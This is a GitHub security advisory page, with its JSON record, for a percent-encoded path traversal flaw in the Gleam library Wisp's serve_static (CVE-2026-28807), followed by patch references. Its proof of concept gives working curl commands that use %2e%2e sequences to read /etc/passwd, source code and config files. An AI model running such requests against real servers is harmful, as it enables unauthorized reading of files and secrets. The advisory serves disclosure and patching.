GHSA-H7CJ-J2VV-QW8R

Vulnerability from github – Published: 2026-03-11 00:11 – Updated: 2026-03-11 05:45
VLAI?
Summary
Wisp Vulnerable to Path Traversal
Details

Summary

wisp.serve_static is vulnerable to arbitrary file read via percent-encoded path traversal (%2e%2e). The directory traversal sanitization runs before percent-decoding, allowing encoded .. sequences to bypass the filter. An unauthenticated attacker can read any file readable by the application process in a single HTTP request.

Details

In src/wisp.gleam, serve_static processes the request path in this order:

let path =
  path
  |> string.drop_start(string.length(prefix))
  |> string.replace(each: "..", with: "")   // Step 1: sanitize
  |> filepath.join(directory, _)

let path = case uri.percent_decode(path) {  // Step 2: decode
  Ok(p) -> p
  Error(_) -> path
}

Sanitization (step 1) strips literal .. but runs before percent-decoding (step 2). The encoded sequence %2e%2e passes through string.replace unchanged, then uri.percent_decode converts it to .., which the OS resolves as directory traversal when the file is read.

PoC

Any application using wisp.serve_static:

fn handle_request(req: wisp.Request) -> wisp.Response {
  use <- wisp.serve_static(req, under: "/static", from: priv_directory())
  wisp.not_found()
}

Exploit (requires --path-as-is to prevent client-side normalization):

# Read /etc/passwd
curl -s --path-as-is \
  "http://localhost:8080/static/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

# Read project source code
curl -s --path-as-is \
  "http://localhost:8080/static/%2e%2e/%2e%2e/src/app.gleam"

# Read project config
curl -s --path-as-is \
  "http://localhost:8080/static/%2e%2e/%2e%2e/gleam.toml"

Impact

This is a path traversal / arbitrary file read vulnerability (CWE-22). Any application using wisp.serve_static is affected. An unauthenticated attacker can read:

  • Application source code
  • Configuration and secrets in priv/
  • .env files, secret_key_base, private keys
  • System files (/etc/passwd, /etc/shadow if permissions allow)

Workaround

Copy the fixed implementation to your codebase and replace references to wisp.serve_static with this version in your codebase.

References

  • Commit that introduced the vulnerability: https://github.com/gleam-wisp/wisp/commit/129dcb1fe10ab1e676145d91477535e1c90ab550
  • Patch Commit: https://github.com/gleam-wisp/wisp/commit/161118c431047f7ef1ff7cabfcc38981877fdd93
Severity ?
8.7 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Hex",
        "name": "wisp"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.1.1"
            },
            {
              "fixed": "2.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-28807"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-11T00:11:39Z",
    "nvd_published_at": "2026-03-10T22:16:18Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\n`wisp.serve_static` is vulnerable to arbitrary file read via percent-encoded path traversal (`%2e%2e`). The directory traversal sanitization runs before percent-decoding, allowing encoded `..` sequences to bypass the filter. An unauthenticated attacker can read any file readable by the application process in a single HTTP request.\n\n### Details\n\nIn `src/wisp.gleam`, `serve_static` processes the request path in this order:\n\n```gleam\nlet path =\n  path\n  |\u003e string.drop_start(string.length(prefix))\n  |\u003e string.replace(each: \"..\", with: \"\")   // Step 1: sanitize\n  |\u003e filepath.join(directory, _)\n\nlet path = case uri.percent_decode(path) {  // Step 2: decode\n  Ok(p) -\u003e p\n  Error(_) -\u003e path\n}\n```\n\nSanitization (step 1) strips literal `..` but runs **before** percent-decoding (step 2). The encoded sequence `%2e%2e` passes through `string.replace` unchanged, then `uri.percent_decode` converts it to `..`, which the OS resolves as directory traversal when the file is read.\n\n### PoC\n\nAny application using `wisp.serve_static`:\n\n```gleam\nfn handle_request(req: wisp.Request) -\u003e wisp.Response {\n  use \u003c- wisp.serve_static(req, under: \"/static\", from: priv_directory())\n  wisp.not_found()\n}\n```\n\nExploit (requires `--path-as-is` to prevent client-side normalization):\n\n```bash\n# Read /etc/passwd\ncurl -s --path-as-is \\\n  \"http://localhost:8080/static/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\"\n\n# Read project source code\ncurl -s --path-as-is \\\n  \"http://localhost:8080/static/%2e%2e/%2e%2e/src/app.gleam\"\n\n# Read project config\ncurl -s --path-as-is \\\n  \"http://localhost:8080/static/%2e%2e/%2e%2e/gleam.toml\"\n```\n\n### Impact\n\nThis is a **path traversal / arbitrary file read** vulnerability (CWE-22). Any application using `wisp.serve_static` is affected. An unauthenticated attacker can read:\n\n- Application source code\n- Configuration and secrets in `priv/`\n- `.env` files, `secret_key_base`, private keys\n- System files (`/etc/passwd`, `/etc/shadow` if permissions allow)\n\n### Workaround\n\nCopy the [fixed implementation](https://github.com/gleam-wisp/wisp/blob/161118c431047f7ef1ff7cabfcc38981877fdd93/src/wisp.gleam#L1413-L1461) to your codebase and replace references to wisp.serve_static with this version in your codebase.\n\n### References\n\n* Commit that introduced the vulnerability: https://github.com/gleam-wisp/wisp/commit/129dcb1fe10ab1e676145d91477535e1c90ab550\n* Patch Commit: https://github.com/gleam-wisp/wisp/commit/161118c431047f7ef1ff7cabfcc38981877fdd93",
  "id": "GHSA-h7cj-j2vv-qw8r",
  "modified": "2026-03-11T05:45:56Z",
  "published": "2026-03-11T00:11:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gleam-wisp/wisp/security/advisories/GHSA-h7cj-j2vv-qw8r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28807"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gleam-wisp/wisp/commit/129dcb1fe10ab1e676145d91477535e1c90ab550"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gleam-wisp/wisp/commit/161118c431047f7ef1ff7cabfcc38981877fdd93"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gleam-wisp/wisp"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Wisp Vulnerable to Path Traversal"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.